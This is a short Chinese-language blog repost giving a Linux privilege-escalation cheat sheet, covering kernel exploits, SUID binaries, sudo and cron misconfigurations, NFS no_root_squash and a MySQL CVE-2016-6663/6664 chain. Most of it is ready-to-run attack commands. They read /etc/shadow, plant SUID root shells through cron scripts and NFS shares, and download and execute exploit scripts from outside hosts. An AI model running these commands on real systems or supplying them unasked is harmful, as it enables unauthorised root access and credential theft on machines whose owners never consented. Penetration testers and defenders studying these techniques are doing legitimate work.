Linux 提权

Posted 浪人联想

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Linux 提权相关的知识,希望对你有一定的参考价值。

文章目录

内核漏洞提权

# 查看系统发行版本
lsb_release -a
# 查看内核版本
uname -a

下载,编译生成exp文件
bypass@ubuntu:~$ make
	
Linux提权辅助工具 github项目地址:
https://github.com/mzet-/linux-exploit-suggester.git
(1)根据操作系统版本号自动查找相应提权脚本
wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh
(2)根据提示下载poc,编译执行。

利用SUID提权

查找可以用来提权的SUID文件

find / -perm -u=s -type f 2>/dev/null

常用:

#Find
find pentestlab -exec whoami \\;
#Vim
vim.tiny /etc/shadow
#awk
awk 'BEGINsystem("whoami")'
#curl
curl file:///etc/shadow
#Bash
bash -p  
#Less
less /etc/passwd
#Nmap
nmap --interactive

SUDO提权

普通用户在使用sudo执行命令的过程中,会以root方式执行命令。在很多场景里,管理员为了运维管理方便,sudoer配置文件错误导致提权。

(1)设置sudo免密码

$vi /etc/sudoers
在最后一行添加:bypass ALL=(ALL:ALL) NOPASSWD:ALL

(2)查看sudo的权限

sudo -l
more /etc/shadow			#no
sudo more /etc/shadow		#ok

计划任务提权

1)如果可以找到可以有权限修改的计划任务脚本,就可以修改脚本实现提权。本质上,就是文件权限配置不当。

ls -l /etc/cron*
more /etc/crontab

2)在xxx.sh 添加 SUID shell后门,当定时任务以root再次执行的时候,可以获取root权限。

cp /bin/bash /tmp/shell
chmod u+s /tmp/shell

NFS提权

当服务器中存在NFS共享,开启no_root_squash选项时,如果客户端使用的是root用户,那么对于共享目录来说,该客户端就有root权限,可以使用它来提升权限。

1)查看NFS服务器上的共享目录

sudo showmount -e 10.1.1.233

(2)创建本地挂载目录,挂载共享目录。使用攻击者本地root权限创建Suid shell。

sudo mkdir -p /tmp/data
sudo mount -t nfs 10.1.1.233:/home/bypass /tmp/data
cp /bin/bash /tmp/data/shell
chmod u+s /tmp/data/shell

(3)回到要提权的服务器上,使用普通用户使用-p参数来获取root权限。

mysql提权

MySQL提权方式有UDF提权,MOF提权,写入启动项提权等方式,但比较有意思的是CVE-2016-6663、CVE-2016-6664组合利用的提取场景,可以将一个www-data权限提升到root权限。

(1)利用CVE-2016-6663将www-data权限提升为mysql权限:

cd /var/www/html/
gcc mysql-privesc-race.c -o mysql-privesc-race -I/usr/include/mysql -lmysqlclient
./mysql-privesc-race test 123456 localhost testdb

(2)利用CVE-2016-6664将Mysql权限提升为root权限:

wget http://legalhackers.com/exploits/CVE-2016-6664/mysql-chowned.sh
chmod 777 mysql-chowned.sh
./mysql-chowned.sh /var/log/mysql/error.log

以上是关于Linux 提权的主要内容,如果未能解决你的问题,请参考以下文章

Linux内核漏洞提权(以CVE-2015-1328为例)

Linux SUID提权&劫持环境变量提权

利用linux漏洞提权

操作系统权限提升(十八)之Linux提权-内核提权

Linux提权-suid提权

Linux权限提升—定时任务环境变量权限配置不当数据库等提权